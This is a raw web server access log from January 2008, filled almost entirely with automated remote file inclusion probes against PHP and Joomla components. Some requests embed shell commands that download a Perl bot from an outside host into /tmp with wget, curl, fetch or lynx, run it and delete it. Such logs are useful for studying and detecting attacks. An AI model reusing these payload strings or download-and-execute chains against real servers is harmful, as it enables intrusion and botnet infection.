72.15.196.106 - - [16/Jan/2008:10:12:55 -0800] "GET /logs/access_071224.log/index.php?pageurl=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.167.95 - - [16/Jan/2008:10:13:00 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.167.95 - - [16/Jan/2008:10:13:00 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.167.95 - - [16/Jan/2008:10:13:01 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.19.126.106 - - [16/Jan/2008:10:14:04 -0800] "GET //login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.77.116 - - [16/Jan/2008:10:14:09 -0800] "GET /logs/access_071229.log//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.77.116 - - [16/Jan/2008:10:14:09 -0800] "GET /logs//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.89.146 - - [16/Jan/2008:10:16:30 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.208.120 - - [16/Jan/2008:10:17:13 -0800] "GET //admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [16/Jan/2008:10:17:18 -0800] "GET //admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.89.146 - - [16/Jan/2008:10:19:37 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.89.146 - - [16/Jan/2008:10:19:37 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.89.146 - - [16/Jan/2008:10:19:37 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.208.82 - - [16/Jan/2008:10:21:30 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.208.82 - - [16/Jan/2008:10:21:30 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.208.82 - - [16/Jan/2008:10:21:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gulvtech.no/gulvtech/bilder/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:10:21:37 -0800] "GET /logs/access_071225.log/index.php?body=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:10:21:37 -0800] "GET /logs/access_071225.log/index.php?body=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:10:21:37 -0800] "GET /index.php?body=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:10:21:38 -0800] "GET /index.php?body=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:10:21:38 -0800] "GET /logs/index.php?body=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [16/Jan/2008:10:21:38 -0800] "GET /logs/index.php?body=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:10:22:11 -0800] "GET //include.php?path[docroot]=http://www.red.info.pl/pub/shelle/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:10:22:11 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;GET+http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+xbot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:10:22:11 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;wget+http://66.220.9.57/web/hyp3r/x.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:10:22:11 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;fetch%20http://66.220.9.57/web/hyp3r/x.txt+%3E%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:10:22:12 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;curl+http://66.220.9.57/web/hyp3r/x.txt+-o+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:10:22:12 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/cmd.txt?&cmd=cd+/tmp;lynx+-source+http://66.220.9.57/web/hyp3r/x.txt+%3E+bot.txt;perl+bot.txt;rm+-rf+bot* HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.198.145 - - [16/Jan/2008:10:22:12 -0800] "GET //include.php?path[docroot]=http://66.220.9.57/web/hyp3r/error.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.197.132 - - [16/Jan/2008:10:22:18 -0800] "GET //admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.205.192 - - [16/Jan/2008:10:22:25 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [16/Jan/2008:10:22:25 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.205.192 - - [16/Jan/2008:10:22:25 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.209.233 - - [16/Jan/2008:10:22:53 -0800] "GET //component/option,com_docman/Itemid,0/task,doc_download/gid,156/index.php?mosConfig_absolute_path=http://m4by.100webspace.net/new/id/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
66.7.209.233 - - [16/Jan/2008:10:22:53 -0800] "GET /logs//component/option,com_docman/Itemid,0/task,doc_download/gid,156/index.php?mosConfig_absolute_path=http://m4by.100webspace.net/new/id/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
195.242.208.120 - - [16/Jan/2008:10:23:29 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [16/Jan/2008:10:23:29 -0800] "GET /logs//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [16/Jan/2008:10:23:37 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [16/Jan/2008:10:23:38 -0800] "GET /logs//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.167.95 - - [16/Jan/2008:10:23:45 -0800] "GET //login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.52.9.218 - - [16/Jan/2008:10:24:00 -0800] "GET //admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:10:24:44 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:10:24:44 -0800] "GET //components/minibb/index.php?absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.17.110.136 - - [16/Jan/2008:10:26:34 -0800] "GET /logs/access_071229.log//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.110.136 - - [16/Jan/2008:10:26:34 -0800] "GET /logs//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [16/Jan/2008:10:27:21 -0800] "GET //admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [16/Jan/2008:10:28:43 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [16/Jan/2008:10:28:43 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [16/Jan/2008:10:28:43 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [16/Jan/2008:10:28:43 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [16/Jan/2008:10:28:43 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [16/Jan/2008:10:28:43 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [16/Jan/2008:10:28:44 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [16/Jan/2008:10:28:44 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [16/Jan/2008:10:28:44 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.63.12 - - [16/Jan/2008:10:28:44 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:10:28:50 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:10:28:50 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:10:28:50 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:10:28:50 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:10:28:50 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:10:28:50 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:10:28:50 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:10:28:50 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.205.39 - - [16/Jan/2008:10:28:58 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [16/Jan/2008:10:28:59 -0800] "GET /logs/access_071229.log//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.126.106 - - [16/Jan/2008:10:28:59 -0800] "GET /logs//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.39 - - [16/Jan/2008:10:29:02 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.148.232.33 - - [16/Jan/2008:10:29:04 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.49.99.53 - - [16/Jan/2008:10:29:04 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.148.232.33 - - [16/Jan/2008:10:29:04 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.49.99.53 - - [16/Jan/2008:10:29:05 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.148.232.33 - - [16/Jan/2008:10:29:06 -0800] "GET /logs///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.148.232.33 - - [16/Jan/2008:10:29:06 -0800] "GET ///administrator/components/com_color/admin.color.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.26.18 - - [16/Jan/2008:10:29:38 -0800] "GET //login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.197.132 - - [16/Jan/2008:10:29:41 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.197.132 - - [16/Jan/2008:10:29:41 -0800] "GET /logs//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.205.192 - - [16/Jan/2008:10:29:56 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.205.39 - - [16/Jan/2008:10:30:57 -0800] "GET /logs/access_071225.log///admin/index.php?loadadminpage=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.39 - - [16/Jan/2008:10:30:57 -0800] "GET ///admin/index.php?loadadminpage=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.39 - - [16/Jan/2008:10:30:57 -0800] "GET /logs///admin/index.php?loadadminpage=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.181.240.100 - - [16/Jan/2008:10:31:41 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.181.240.100 - - [16/Jan/2008:10:31:41 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.181.240.100 - - [16/Jan/2008:10:31:41 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.208.33.251 - - [16/Jan/2008:10:31:54 -0800] "GET //login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:10:32:40 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [16/Jan/2008:10:32:40 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.52.9.218 - - [16/Jan/2008:10:33:00 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [16/Jan/2008:10:33:00 -0800] "GET /logs//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.194.165.206 - - [16/Jan/2008:10:34:46 -0800] "GET /logs/access_071229.log//login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.157.77 - - [16/Jan/2008:10:34:58 -0800] "GET /logs/access_071219.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.fm24forum.de/jobs/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.157.77 - - [16/Jan/2008:10:34:58 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.fm24forum.de/jobs/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.157.77 - - [16/Jan/2008:10:34:59 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.fm24forum.de/jobs/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.73 - - [16/Jan/2008:10:35:18 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.216.205.192 - - [16/Jan/2008:10:35:20 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://photographersusa.com/catimages/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.148.232.98 - - [16/Jan/2008:10:36:59 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.148.232.98 - - [16/Jan/2008:10:36:59 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.148.232.98 - - [16/Jan/2008:10:37:00 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.157.77 - - [16/Jan/2008:10:37:14 -0800] "GET /logs/access_071212.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.fm24forum.de/jobs/lol.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [16/Jan/2008:10:39:02 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [16/Jan/2008:10:39:03 -0800] "GET /logs//admin.php?include_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:10:40:47 -0800] "GET /logs/access_071219.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:10:40:47 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:10:40:47 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:10:41:57 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.53.229.194 - - [16/Jan/2008:10:41:57 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
85.25.150.206 - - [16/Jan/2008:10:41:58 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [16/Jan/2008:10:43:02 -0800] "GET /logs/access_071212.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.eldesbande.com/index/install/info.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:10:43:39 -0800] "GET /logs/access_071229.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:10:43:48 -0800] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:10:43:49 -0800] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.181.4.175 - - [16/Jan/2008:10:44:10 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
